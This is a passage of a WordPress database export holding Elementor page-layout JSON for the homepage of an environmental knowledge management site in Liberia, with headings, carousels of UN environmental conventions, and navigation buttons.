fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13147,2132,'_elementor_version','2.7.5'),(13148,2132,'_elementor_template_type','wp-page'),(13149,2132,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13152,2133,'_wp_page_template','default'),(13153,2133,'_elementor_edit_mode','builder'),(13154,2133,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(17,59,102,0.83)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":29,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental 